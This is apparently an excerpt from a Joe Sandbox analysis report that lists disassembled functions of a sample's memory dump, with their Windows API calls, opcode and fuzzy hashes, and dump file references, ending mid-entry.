Instruction ID: 44a37231822cbb76bdab0e0c7f75532f5573ffbe41160ee759f69fc963c93f0b
Opcode Fuzzy Hash: ec267ef5fbdaa3f9e1d1a83b48992d94225609b3d47fb319548853c23fddb68d
Instruction Fuzzy Hash: 4962F4715002C58FDB1ADF35C8867EA3BA9BF54300F08857EED9A8B282DB759D45CB60

Function 009FF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 009FF844
IsDebuggerPresent.KERNEL32 ref: 009FF910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009FF930
UnhandledExceptionFilter.KERNEL32(?), ref: 009FF93A

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 8cb1b462f05ee9eb08da3718a722f72588afc684885cb6078dec1f69d7741719
Instruction ID: 423ef3a34030ed410aa4896cd5e0bf098775765b780e536b1ef4974fd9ee273b
Opcode Fuzzy Hash: 8cb1b462f05ee9eb08da3718a722f72588afc684885cb6078dec1f69d7741719
Instruction Fuzzy Hash: C1312975D0521DABDF20DFA4D9897CCBBB8AF08304F1041EAE50DAB250EB719B858F44

Function 009FE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,009FE5E8,0000001C,009FE7DD,00000000,?,?,?,?,?,?,?,009FE5E8,00000004,00A41CEC,009FE86D), ref: 009FE6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,009FE5E8,00000004,00A41CEC,009FE86D), ref: 009FE6CF

Strings

D, xrefs: 009FE6C3

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: d0988a8041ec6c391db381f68f1e977a3e0cb808e0389fa357a11c40a5efb1c7
Instruction ID: fcf0a9ad725ccc8f8b7a7f63a082641d4e3fa315c43614f26d4156f8079493a0
Opcode Fuzzy Hash: d0988a8041ec6c391db381f68f1e977a3e0cb808e0389fa357a11c40a5efb1c7
Instruction Fuzzy Hash: CB01847260010D6BDF14DE69DC49AED7BAAAFC4324F0CC224EE59D6154D734DD068790

Function 00A08EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00A08FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00A08FBF
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00A08FCC

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: b9f73d7875b6f98bd2a5dedc7005db23696eb9db062c1d59170ec2c71d15dae9
Instruction ID: 4f959155f38a8ebe1b6fc7d1b2d59fe737f27d18c115525a9a529ab29381c310
Opcode Fuzzy Hash: b9f73d7875b6f98bd2a5dedc7005db23696eb9db062c1d59170ec2c71d15dae9
Instruction Fuzzy Hash: 5531B77590121DABCB21DF64D8897DDBBB8AF48310F5042EAE51CA6290EB749F858F44

Function 00A0B348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 00A0B4DB

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 62ef6eb7f6634161ac6756e759f2ce9c5e531debcec6cef571b7c107ae28aa61
Instruction ID: 0bfbb987935d44c457d8720b55169159ceef88ec5cb9b2689c97e26b931d5b36
Opcode Fuzzy Hash: 62ef6eb7f6634161ac6756e759f2ce9c5e531debcec6cef571b7c107ae28aa61
Instruction Fuzzy Hash: 7231127181024DAFCB24DF78ED84EFA7BBDDB85304F1441A8E91897282E7319E418B60

Function 00A0D440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction ID: 30d453a090fef5af29cc158d738eb067368647f5dbaf1877af9d79575bf97f55
Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction Fuzzy Hash: 4F023C72E002199BDF14CFA9D9906ADFBF1EF88314F258269D919EB380D731AD45CB90

Function 009FAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 009FAF35
GetNumberFormatW.KERNEL32(00000400,00000000,?,00A1E72C,?,?), ref: 009FAF84

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 590ae1a1c8bfe1b9a96a13ed8ee798d997663df3d88a6fd1f939eada8c4f2a2e
Instruction ID: 5e2ac47c64774209c60daa2e53d580f65eb9da7f4a977b4ebd437bff3086d0a2
Opcode Fuzzy Hash: 590ae1a1c8bfe1b9a96a13ed8ee798d997663df3d88a6fd1f939eada8c4f2a2e
Instruction Fuzzy Hash: 08015A7A550308BFDB10DFA5EC45FEA77BCEF48710F009422FA05A71A0E370A9168BA5

Function 009E6C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(009E6DDF,00000000,00000400), ref: 009E6C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 009E6C95

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: a8d0f89f2c56e9e5d1f2a42396f6fdd1fca95c8ecafa1656720388500bc5cf3a
Instruction ID: cc0e867382f231107e91d67d8eba01ec70b459639be1e45df786989b20565b1f
Opcode Fuzzy Hash: a8d0f89f2c56e9e5d1f2a42396f6fdd1fca95c8ecafa1656720388500bc5cf3a
Instruction Fuzzy Hash: 22D0C735344300BFFE114F624D06F5A7B99BF55BD1F24C4047796D40E0C6749915A615

Function 00A119F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A119EF,?,?,00000008,?,?,00A1168F,00000000), ref: 00A11C21

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 6b406bdd3798fd0e21a975440e8a9d289b3bcfe38002596e4ce8d7d0993bd717
Instruction ID: 65e09b1ef8be6b92554f99ef7c82ab70d5fc81af1cded91a25f2b06f5030bba5
Opcode Fuzzy Hash: 6b406bdd3798fd0e21a975440e8a9d289b3bcfe38002596e4ce8d7d0993bd717
Instruction Fuzzy Hash: 9FB15C31614608DFD719CF28C48ABA57BE0FF45364F298658E99ACF2A1D335ED92CB40

Function 009FF654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 009FF66A

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: e5ac92a08cb6a40f584aa9f04ddf7cf18af57888915b20f778375335ed30b7e6
Instruction ID: eb5759d9188bbc7b68de7c9e791364a0b88fd1fb59d0cab08d63db49f34b4ced
Opcode Fuzzy Hash: e5ac92a08cb6a40f584aa9f04ddf7cf18af57888915b20f778375335ed30b7e6
Instruction Fuzzy Hash: B9518FB5D006098FEB25CF94E8917AABBF4FF88354F28853AD901EB290D3759941CF50

Function 009EB146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 009EB16B

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 3d0f575221e76f058a1a79398f83d7960b68b26a745533cd3719830a6d8c3aff
Instruction ID: fa39dc433476976c51d0302b52178deec63d44e39e7035e60aeba112d01f09a7
Opcode Fuzzy Hash: 3d0f575221e76f058a1a79398f83d7960b68b26a745533cd3719830a6d8c3aff
Instruction Fuzzy Hash: 60F054B4D042488FDB28CF5CEC916E673F5F758315F1046A5DA1593390C370AD82CE60

Function 009E40FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

gj, xrefs: 009E41BC

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: e3957358ea6c7afd0796d0e5ef60b5c3dc9b03e2205257477125fd3ab26b3ad4
Instruction ID: 8beb204d65657ff37225075a900b092e25ea3e547bfc2ea5359ba6e4e9bbda06
Opcode Fuzzy Hash: e3957358ea6c7afd0796d0e5ef60b5c3dc9b03e2205257477125fd3ab26b3ad4
Instruction Fuzzy Hash: E9C14672A183818FD754CF29D88065BFBE1BFC8208F19892DE998D7311D734E949CB96

Function 009FF9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,009FF3A5), ref: 009FF9DA

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c29fc3a88076f49e4f93b4fb61fe69a976ac58cc220ce3f231a9ef2a024d1305
Instruction ID: b03d6ebb8c7365ace61973d6cd20a739bd0df8cfccdcf87b0784fe2e43033b51
Opcode Fuzzy Hash: c29fc3a88076f49e4f93b4fb61fe69a976ac58cc220ce3f231a9ef2a024d1305
Instruction Fuzzy Hash:

Function 00A0C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00A0C030

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: b5276960d65af485af2b440e5c555a1c1c75a38dfd1c2d6ef2f7497c28c8a852
Instruction ID: c293da56a6359fe04ccfa51cd5d8bf5cfa2df5add4a43e52aca4afd00d17fc9d
Opcode Fuzzy Hash: b5276960d65af485af2b440e5c555a1c1c75a38dfd1c2d6ef2f7497c28c8a852
Instruction Fuzzy Hash: 7EA02434101100DFDF40CF705F0C34C3FD5D5411C030540157C05C0030D73040515700

Function 009F62CA Relevance: .8, Instructions: 829COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
Instruction ID: 6d6ad681a29fa9b1adb794b94db97508d3c7a32d60d051340c5dde5874c8fd51
Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
Instruction Fuzzy Hash: 8E62F6716047899FCB25CF38C4906B9BBE1BF95304F08896DEAEA8B346D734E945CB11

Function 009F77EF Relevance: .8, Instructions: 817COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
Instruction ID: 37786814b77667ee18a48bc98a4e02c79dd8f700ea36aebbbdb0ea59c47fc25a
Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
Instruction Fuzzy Hash: C562D77160C3898FCB15CF68C890AB9FBE1BF95304F18896DE99A8B346D730E945CB15

Function 009EF461 Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
Instruction ID: 5537b2bf1e001ed41c19f63b459c40eb6f60528150c74b8d3d0a702860013548
Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
Instruction Fuzzy Hash: D1524A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86

Function 009F7153 Relevance: .5, Instructions: 536COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c73b3b1e0fc141f350da3bce47ccba394551b5e5418e48adcf610619b727d131
Instruction ID: 4158855fdbadd1c19b023de8c2e12272bd8df951fbc92c4e5005a7aeafcbd568
Opcode Fuzzy Hash: c73b3b1e0fc141f350da3bce47ccba394551b5e5418e48adcf610619b727d131
Instruction Fuzzy Hash: EC12C2B161870A9FC718CF68C890AB9F7E1FF94304F10492EEA96C7781E374A995CB45

Function 009EC426 Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ea0a8136c4a151d373e91e8689bf883843fe32cb39caaa808bc40abcd3c0a7b
Instruction ID: 6cb72ec588388b43a6553a4ad4ab6c1988ca7e8080911403b1bfd86566890fd3
Opcode Fuzzy Hash: 7ea0a8136c4a151d373e91e8689bf883843fe32cb39caaa808bc40abcd3c0a7b
Instruction Fuzzy Hash: 11F19DB16083828FC716CF2AC58462EBBE5FFC9718F144A2EF4C597252D630ED468B42

Function 009F6CDC Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ef3fe3baf808f39c7edaeba78015b7ac39b7ad5cd8a9ad4ff1b11aee056078fb
Instruction ID: c49bc4784545a992e468c1ba5ee97b4b1bad4ad8d5973e05bd38a97547c6e8f0
Opcode Fuzzy Hash: ef3fe3baf808f39c7edaeba78015b7ac39b7ad5cd8a9ad4ff1b11aee056078fb
Instruction Fuzzy Hash: 7ED1C6716083498FDB14CF28C9407ABBBE5FF89308F08496DEA899B342D774E915CB56

Function 009EE9B7 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

